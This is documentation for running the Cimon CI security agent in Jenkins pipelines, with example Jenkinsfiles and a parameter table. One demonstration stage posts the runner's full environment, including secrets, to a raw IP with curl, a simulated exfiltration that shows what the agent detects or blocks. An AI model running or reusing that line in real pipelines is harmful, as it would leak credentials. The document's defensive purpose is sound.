Jenkins (Beta)

Jenkins does not offer out-of-the-box hosted runners the way GitHub Actions and Azure Pipelines do, but it provides great flexibility to use self-hosted runners of varying execution types.

Jenkins Self-Hosted Runners Support

In Jenkins, there are two types of execution: creating virtual or physical nodes that execute jobs, or setting up a cloud (e.g., Docker-based, K8s-based, etc.) that provisions the job.

In both cases the underlying operating system must meet the minimal requirements for loading and running eBPF code. You can find more information in the self-hosted support and troubleshooting section.

Cimon Jenkins Pipeline

Jenkins supports running Cimon on all major pipeline types - "Freestyle project", "Pipeline", and "Multibranch Pipeline". As an example, here is a Jenkinsfile that creates a build and runs Cimon:

```groovy
pipeline {
    agent any

    environment {
        CIMON_CLIENT_ID = credentials("cimon-client-id")
        CIMON_SECRET = credentials("cimon-secret")
    }

    options {
        disableConcurrentBuilds()
    }

    stages {
        stage('Run Cimon') {
            steps {
                sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/run_cimon.sh | sudo -E sh -s -- agent'
            }
        }

        stage('Test') {
            steps {
                sh 'git clone https://github.com/octocat/Hello-World Hello-World'
            }
        }

        stage('Allowed network traffic') {
            steps {
                sh 'curl -sm 1 https://34.121.34.97 || true'
            }
        }

        stage('Allowed network traffic (hostname)') {
            steps {
                sh 'wget --quiet --timeout 1 https://cycode.com || true'
                sh 'wget --quiet --timeout 1 https://registry.npmjs.org || true'
            }
        }

        stage('Forbidden network traffic (IP)') {
            steps {
                sh 'curl -sm 1 -d "$(env)" https://34.121.34.100/upload/v2 || true'
            }
        }

        stage('Forbidden network traffic (hostname)') {
            steps {
                sh 'wget --quiet --timeout 1 https://yahoo.com || true'
            }
        }
    }
    post {
        always {
            cleanWs()
            sh """
            curl -sSfL https://cimon-releases.s3.amazonaws.com/stop_cimon.sh | sudo -E sh
            """
        }
    }
}
```

Explanation:

```groovy
environment {
    CIMON_CLIENT_ID = credentials("cimon-client-id")
    CIMON_SECRET = credentials("cimon-secret")
}
```

Cimon receives its input parameters through environment variables; the security policy is configured with these variables.

```groovy
options {
    disableConcurrentBuilds()
}
```

This option must be enabled so that the Cimon installation step is guaranteed to run first.

```groovy
stage('Run Cimon') {
    steps {
        sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/run_cimon.sh | sudo -E sh -s -- agent'
    }
}
```

Installs the Cimon agent on the runner.

```groovy
post {
    always {
        cleanWs()
        sh """
        curl -sSfL https://cimon-releases.s3.amazonaws.com/stop_cimon.sh | sudo -E sh
        """
    }
}
```

The Cimon agent is stopped and the report is printed.

Usage

Here are the parameters that are supported:

| Environment Variable | Default | Description |
| --- | --- | --- |
| CIMON_CLIENT_ID | | Cimon client ID for authentication |
| CIMON_SECRET | | Cimon secret for authentication |
| CIMON_URL | | Cimon endpoint for authentication |
| CIMON_PREVENT | false | Enable prevention mode |
| CIMON_ALLOWED_IPS | | A comma- or whitespace-separated list of allowed IP addresses |
| CIMON_ALLOWED_HOSTS | | A comma- or whitespace-separated list of allowed domain names. The left-most label can be the wildcard character (*) to match multiple subdomains (e.g. *.example.com). |
| CIMON_IGNORED_IP_NETS | | A comma- or whitespace-separated list of ignored IP networks in CIDR notation, e.g. 10.0.0.0/8, 172.16.0.0/12. This setting is mandatory if your workflow runs containers attached to a custom network with a configured sub-range. In other words, inter-container networking is usually ignored by Cimon. Cimon implicitly ignores the 10.0.0.0/8 and 172.16.0.0/12 networks. |
| CIMON_REPORT_PROCESS_TREE | false | Enable to report the process tree |
| CIMON_SLACK_WEBHOOK_ENDPOINT | | Slack webhook endpoint to report security events |
| CIMON_LOG_LEVEL | info | Log level (used for debugging) |
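
The Jenkinsfile above runs Cimon in its default detect-only mode, so the "Forbidden" stages are reported but still succeed. As an added example (not from the original page), here is a variant of that pipeline with prevention mode turned on and the parameters from the table set for the stages it keeps: the hostnames and IP the allowed stages reach are allowlisted, and the forbidden request is blocked rather than only reported. It assumes that github.com is the only host the clone needs and uses a constructed 192.168.100.0/24 range to stand in for a custom container network.

```groovy
pipeline {
    agent any

    environment {
        CIMON_CLIENT_ID = credentials("cimon-client-id")
        CIMON_SECRET = credentials("cimon-secret")
        // Block, rather than only report, traffic outside the allowlist below.
        CIMON_PREVENT = "true"
        // Hosts the stages in this pipeline need (assumption: the clone
        // only contacts github.com); extend with your own endpoints.
        CIMON_ALLOWED_HOSTS = "github.com cycode.com registry.npmjs.org"
        CIMON_ALLOWED_IPS = "34.121.34.97"
        // Constructed example range for a custom container network; traffic
        // inside it is ignored instead of being evaluated against the policy.
        CIMON_IGNORED_IP_NETS = "192.168.100.0/24"
        // Include the process tree in the final report for triage.
        CIMON_REPORT_PROCESS_TREE = "true"
    }

    options {
        disableConcurrentBuilds()
    }

    stages {
        stage('Run Cimon') {
            steps {
                sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/run_cimon.sh | sudo -E sh -s -- agent'
            }
        }
        stage('Test') {
            steps {
                sh 'git clone https://github.com/octocat/Hello-World Hello-World'
            }
        }
        stage('Forbidden network traffic (hostname)') {
            steps {
                // yahoo.com is not allowlisted, so with CIMON_PREVENT=true the
                // request is blocked; '|| true' keeps the stage from failing.
                sh 'wget --quiet --timeout 1 https://yahoo.com || true'
            }
        }
    }
    post {
        always {
            cleanWs()
            sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/stop_cimon.sh | sudo -E sh'
        }
    }
}
```

Before enabling CIMON_PREVENT on a real job, run it once in the default mode and copy every destination the report lists as needed into CIMON_ALLOWED_HOSTS or CIMON_ALLOWED_IPS.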

Report

Cimon prints the final report in the build logs of each job.